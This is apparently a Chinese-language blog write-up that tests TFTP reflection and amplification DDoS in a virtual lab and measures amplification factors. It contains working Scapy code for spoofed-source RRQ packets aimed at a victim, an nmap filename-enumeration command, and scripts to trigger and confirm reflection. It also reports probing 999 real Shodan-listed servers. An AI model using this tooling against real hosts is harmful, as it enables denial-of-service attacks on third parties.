經由@殺戮提示,讓我看看softpedia上的這篇報道,咱就來研究一下文中的使用TFTP(Trivial File Transfer Protocol,簡單文件傳輸協議)進行反射型DDOS攻擊。在報道的最后提到了Evaluation of TFTP DDoS amplification attack這篇論文,論文還是比較學術派和嚴謹的,其中使用GNS3和虛擬機搭建模擬環境,盡量嚴格控制相關變量與不變量,對TFTPD32,SolarWinds,OpenTFTP三種TFTP服務器進行研究。論文中還利用TFTP協議自身的缺陷來進行DOS攻擊,同時對DOS攻擊的反射因子,請求響應延遲,總吞吐量,CPU消耗率等方面進行了詳細的測驗與評估。
當然,自己實際地測試觀察TFTP反射放大攻擊的影響還是很有必要的。所以本文就在那篇論文的基礎上,利用Kali2等虛擬機,對反射流量和反射因子進行檢測計算,適當探究相關的限制與利用。
DDOS是分布式拒絕服務攻擊,研究的基礎也就在于拒絕服務;論文中三種TFTP服務器的測試也是為了相互對比參照,由于不同服務器的特性不同而響應的行為也不同,其中的任何一種服務也具有通用的特性。所以為了方便驗證研究,我們就簡單地搭建在Kali2上搭建tftp服務(對于協議特點的學習,我比較喜歡直觀的辦法,搭建好必要服務后抓包看其數據包的結構),對其反射放大流量的利用進行測試,而暫且拋開分布式和其他類型服務器的對比話題。相信這些都是見微知著的,也歡迎你進行其他方面的深入探究交流。
我們在更新源了的Kali2上進行tftp的安裝,詳細過程可見這里和那里。在Kali上自帶的有tftp客戶端,我們可以不用再進行安裝。其中主要使用了使用xinetd超級守護進程更加方便安全地管理使用tftp服務。最后在服務都安裝好后,測試圖如下:
在這里值得一提的是,客戶端上鍵入?發現有put命令可以直接上傳文件,但是會引發Error code 2: Access violation錯誤。究其原因查看man手冊可知道,因為咱們之前在登錄的時候沒有經過認證就可以讀取文件,所以處于安全的考慮,只有文件存在而且對于所有的用戶都可寫才能put相應文件,這一點也會成為之后攻擊的一個限制。
對于TFTP協議百度和WiKi也有比較詳細的介紹,這里不多贅述。我覺得其中最需要理解的有以下三點:
下面給出TFTP數據包的幾種類型:
TFTP Formats
Type Op # Format without header
2 bytes string 1 byte string 1 byte
-----------------------------------------------
RRQ/ | 01/02 | Filename | 0 | Mode | 0 |
WRQ -----------------------------------------------
2 bytes 2 bytes n bytes
---------------------------------
DATA | 03 | Block # | Data |
---------------------------------
2 bytes 2 bytes
-------------------
ACK | 04 | Block # |
--------------------
2 bytes 2 bytes string 1 byte
----------------------------------------
ERROR | 05 | ErrorCode | ErrMsg | 0 |
----------------------------------------
就拿A對S上的RRQ (read request)文件過程來演示一下,如下圖:
具體過程文字描述如下:
實際測試的抓包圖如下:
反射是過程,放大是結果。對于拒絕服務攻擊來說,常用的方式有這么幾種:1.濫用合理的服務請求;2.制造高流量無用數據;3.利用傳輸協議缺陷;4.利用服務程序的漏洞。TFTP反射放大攻擊就是利用了協議上的缺陷或者說是特性,其中關鍵點有二:
下面我就在本機上借由Scapy偽造源地址數據包,向服務端(Kali2)發送RRQ數據包請求get服務器上的文件,進而將響應DATA包發射給目標機(XP),誘發重傳機制造成放大攻擊。利用Scapy如下:
#!python
>>> a = IP(dst='192.168.1.104',src='192.168.1.102')/UDP(sport=445,dport=69)/TFTP()/TFTP_RRQ(filename='larry')
>>> a
<IP frag=0 proto=udp src=192.168.1.102 dst=192.168.1.104 |<UDP sport=microsoft_ds dport=tftp |<TFTP op=RRQ |<TFTP_RRQ filename='larry' |>>>>
也還是有兩點需要說明,我們這里偽造的源端口用的是XP SP3默認開啟的UDP端口之一(123,137,138,445,500,1900),當然你也可以用其他你在攻擊目標上掃描出來的端口;另一點就是為了達到放大數據包大小的最佳效果,我們這里RRQ的已知文件的大小必須大于512字節為好。三個主機在同一個網段下的測試結果圖如下:
在搭建傳統的LAN環境的時候,會要求TFTP服務器對所有客戶端是可連接的,通常會將其拿來當做內部網絡網關。如果這些TFTP服務器同時暴露在外的話,我們就可以利用其在網絡當中的角色加上對源地址無驗證的缺陷,對內網機器進行DOS攻擊。當然雞肋的會是我們不知道在內網當中有哪些機器,就算攻擊成功了,由于沒有回執響應,我們就不知道實際情況是如何而“盲打”一通了。在vbox當中創建一個內網環境,同時給服務端設置兩個網卡,測試結果如下:
從以上的測試結果可以看出由于tftpd服務的特性,在服務端未接收到ACK數據包時,會默認進行5次重傳,并且重傳時間間隔(可設置)為5秒。對于不同的反射放大攻擊,例如Smurf,DNS,NTP,TCP-based,SNMP等反射放大攻擊,研究時通常會計算其中的反射因子/放大倍數作為相互比較的標準。在基于tftpd的TFTP反射放大攻擊中,這里響應數據包大小總和比上請求數據包大小為:558*5/60=46.5。為了簡單地對比一下,我還是在XP上下載了tftpd32,然后再去get自帶的文件tftpd32.chm(其實在默認狀態下tftpd32是允許put文件的,但也可在Setting中設置為Read Only模式)。tftpd32的特性就是會重傳6次,時間間隔依次為1,2,3,3,3秒,最后還會發送一個ERROR數據包。這里拋開ERROR數據包計算反射因子的話就是558*6/62=54。
在論文中的tftpd32版本可能有所不同,反射因子為59.78,這個放大因子和其他反射放大攻擊相比較還是很可觀的:
在以上的測試過程中,對于TFTP反射放大攻擊利用的限制點主要有三點:
1. 獲取TFTP服務器上存在的文件名
雖然服務器端無認證過程可以隨意登錄,但是無法列目錄,而造成反射的基礎就是需要服務端能夠發送出DATA數據包。這就需要我們一個個get測試看看TFTP服務器上存在哪些常見的文件了,我們可以對思科(廣泛使用TFTP服務)設備文件和其他你認為有可能存在的文件進行測試。還好nmap在這里給我們提供了一個tftp-enum.nse腳本,可以如下使用:
#!shell
$ sudo nmap -sU -p 69 --script tftp-enum.nse --script-args="tftp-enum.filelist=customlist.txt" <host>
如果未加--script-args的話,腳本會默認調用tftplist.txt文件去枚舉可能存在的文件。當然,tftp-enum.filelist可以指定自定義的列表進行枚舉掃描。測試結果示例如下:
論文當中說是有599600臺(2012年掃描結果)對外開放的TFTP服務器可能會被用來進行發射放大攻擊,但在shodan上搜索tftp的結果也只有10w左右的樣子,可能有待進一步的掃描發現。以下是我在shodan中搜索出的999個IP進行測試,其中有47個服務器可以get到默認的文件:
2. TFTP服務器上已知文件的大小
反射過來的DATA數據包的大小取決于讀取文件的內容大小,這樣就決定了我們最終反射放大的程度(相對于已知文件的文件名長度——影響請求包大小)。如果DATA數據包過小造成的影響也就很有限的了。
3. 確定TFTP服務器可利用
除了以上兩點,如果存在其他的過濾機制,我們最終就需要測試一下該TFTP服務是否可利用,在攻擊端偽造簡單的數據包觸發其反射到指定的主機上,代碼如下:
#!python
#!/usr/bin/env python
#coding=utf-8
import optparse
import sys
import logging
from scapy.all import *
class Trigger(object):
def __init__(self, target, port, filename, server):
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
self.target = target
self.port = port
self.filename = filename
self.server = server
def run(self):
t = IP(src=self.target, dst=self.server)/UDP(sport=self.port, dport=69)/TFTP()/TFTP_RRQ(filename=self.filename)
send(t)
print '[+] The trigger has benn sent !'
if __name__ == '__main__':
parser = optparse.OptionParser('uasge: %prog [options]')
parser.add_option('-t', '--target', default=None,help='The ip of target')
parser.add_option('-f', '--filename', default='larry', help='The filename for RRQ')
parser.add_option('-p', '--port', type=int, default=2333, help='The src port of target')
(options, args) = parser.parse_args()
if len(args) < 1 or options.target == None:
parser.print_help()
sys.exit(0)
trigger = Trigger(target=options.target, port=options.port, filename=options.filename, server=args[0])
trigger.run()
在我們之前指定的主機上檢測一下是否有如期的DATA數據包到來即可,代碼如下:
#!python
#!/usr/bin/env python
#coding=utf-8
import optparse
import sys
import logging
from scapy.all import *
class Sniff(object):
def __init__(self, port):
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
self.port = port
def run(self):
try:
sniff(prn=self.udp_monitor_callback, filter='udp', store=0)
except KeyboardInterrupt as e:
print '[+] Bye !'
sys.exit(0)
def udp_monitor_callback(self, pkt):
if pkt.getlayer(Raw):
raw_load = pkt.getlayer(Raw).load
if pkt[UDP].dport == self.port and raw_load[:4] == '\x00\x03\x00\x01':
print '[+] The server %s is available' % (pkt[IP].src)
sys.exit(0)
if __name__ == '__main__':
parser = optparse.OptionParser('usage: %prog [options]')
parser.add_option('-p', '--port', type=int, default=2333, help='The port from server')
(options, args) = parser.parse_args()
if len(args) > 0:
parser.print_help()
sys.exit(0)
s = Sniff(port=options.port)
s.run()
這樣一放一收就可以知道該TFTP服務器是否可以利用了。